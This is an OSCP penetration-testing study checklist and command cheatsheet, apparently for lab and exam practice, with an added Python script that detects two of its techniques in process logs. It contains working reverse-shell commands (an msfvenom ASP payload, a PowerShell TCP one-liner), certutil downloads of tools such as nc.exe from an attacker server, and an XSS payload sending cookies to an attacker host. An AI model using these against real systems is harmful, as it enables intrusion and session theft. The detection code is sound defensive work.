OSCP Methodology

Introduction

About
This checklist aims to give OSCP students a baseline methodology for the lab and exam environments.

Checks
  • Scanning
  • Enumeration
  • Exploitation
  • Privilege Escalation
  • Flags
  • Post Exploitation

Quick Command Cheatsheet

Command:
  lsof -i
  kill -9 PID
Description:
  Find the process holding a port with lsof -i, then kill a specific service that you don't use anymore with kill -9 PID.

Command:
  rdesktop -g 90% $IP
Description:
  Remote desktop with the screen area set to 90%.

Command:
  python -m SimpleHTTPServer 8000

  certutil.exe -urlcache -split -f http://10.11.0.105:80/EX.exe
  certutil.exe -urlcache -split -f http://10.11.0.105:8000/ipsec.sh accesschk.txt
  certutil.exe -urlcache -split -f http://10.11.0.105:8000/icacls.exe icacls.exe
  certutil.exe -urlcache -split -f http://10.11.0.105:8000/nc.exe nc.exe
Description:
  Transfer files using certutil. This has been my rock during the OSCP challenge. Host a web server on your box; I've used the Python web server.

Command:
  msfvenom -p windows/shell/reverse_tcp LHOST=10.11.0.105 LPORT=3333 -f asp > wireshell.asp

  Within Metasploit:
  use exploit/multi/handler
  set payload windows/shell/reverse_tcp
  set lhost 10.11.0.105
  set lport 3333
Description:
  multi/handler example (the handler payload matches the one given to msfvenom). Allowed during the exam.

Command:
  $client = New-Object System.Net.Sockets.TCPClient("10.10.XX.XX",77);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
Description:
  Shell using a PowerShell TCP one-liner.

Command:
  Create a cookie.js file:

  var img = document.createElement("img");
  img.src = "http://youripaddress/ddos?" + escape(document.cookie);
  document.body.appendChild(img);

  Copy it to the web server and inject:
  '">><script src="http://10.XX.XX.XX/cookie.js"></script>
Description:
  Stealing cookies using XSS.
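The certutil transfer and the PowerShell TCP one-liner above both leave a recognisable process command line behind. As an added example (not part of the original checklist), this Python script shows the detection side: it parses process-creation log lines and flags those two patterns. The log format and the host, user and IP values are constructed for the example.

```python
import re

# Constructed sample process-creation log lines (not taken from any real host):
# "<timestamp> host=<name> user=<user> cmd=<command line>"
SAMPLE_LOG = [
    "2024-01-01T10:00:01 host=WS01 user=bob cmd=certutil.exe -urlcache -split -f http://10.11.0.105:8000/nc.exe nc.exe",
    "2024-01-01T10:00:05 host=WS01 user=bob cmd=certutil.exe -verify cert.cer",
    "2024-01-01T10:00:09 host=WS02 user=alice cmd=powershell.exe -nop -c $client = New-Object System.Net.Sockets.TCPClient('10.10.14.2',77);$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String)",
    "2024-01-01T10:00:12 host=WS02 user=alice cmd=powershell.exe Get-ChildItem C:\\Users",
]

RULES = [
    # certutil fetching a remote file with -urlcache ... -f <url>: the
    # living-off-the-land download technique from the cheatsheet.
    ("certutil_download",
     re.compile(r"certutil(\.exe)?\s.*-urlcache\s.*-f\s+https?://", re.I)),
    # PowerShell opening a raw TCP socket and feeding what it reads into
    # iex / Invoke-Expression: the shape of the TCP one-liner.
    ("powershell_tcp_shell",
     re.compile(r"powershell.*Sockets\.TCPClient.*(?:\biex\b|Invoke-Expression)", re.I)),
]

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+user=(?P<user>\S+)\s+cmd=(?P<cmd>.*)$")


def parse_line(line):
    """Split one log line into its fields; return None for lines that don't fit the format."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def detect(lines):
    """Return a (rule_name, host, user) tuple for every line that matches a rule."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, pattern in RULES:
            if pattern.search(rec["cmd"]):
                hits.append((name, rec["host"], rec["user"]))
    return hits


if __name__ == "__main__":
    for hit in detect(SAMPLE_LOG):
        print(hit)
```

The second certutil line (a plain certificate verification) and the ordinary Get-ChildItem call are left alone, so the rules key on the download/shell shape rather than on the binary name.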


Non-OSCP machines

Some CTF machines you can practise on before taking the OSCP challenge.